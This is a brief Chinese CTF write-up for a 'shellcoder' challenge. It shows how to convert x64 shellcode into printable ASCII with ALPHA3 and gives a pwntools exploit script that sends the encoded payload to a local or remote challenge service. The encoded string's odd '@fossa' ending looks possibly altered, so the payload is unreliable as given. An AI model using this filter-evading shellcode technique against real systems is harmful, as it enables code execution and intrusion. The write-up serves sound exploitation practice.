一个可见字符的shellcode
使用一个叫做alpha3-master的工具,将shellcode进行转换。
先把shellcode写进一个文件,然后给它用ALPHA3转换成纯字符
p2 ./ALPHA3.py x64 ascii mixedcase rax --input="shellcode"
注意要使用python2,python会报错。
参考:
http://taqini.space/2020/03/31/alpha-shellcode-gen/#%E7%94%9F%E6%88%90shellcode
exp
from pwn import *
context.arch='amd64'
context.log_level="debug"
sc = "Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a071N00gao@fossa"
isRemote=0
if isRemote==0:
io=process("./shellcoder")
else:
io=remote("43.143.7.127",28707)
#io=remote("43.143.7.127",28707)
#print sc
#不要用sendline
io.send(sc)
io.interactive()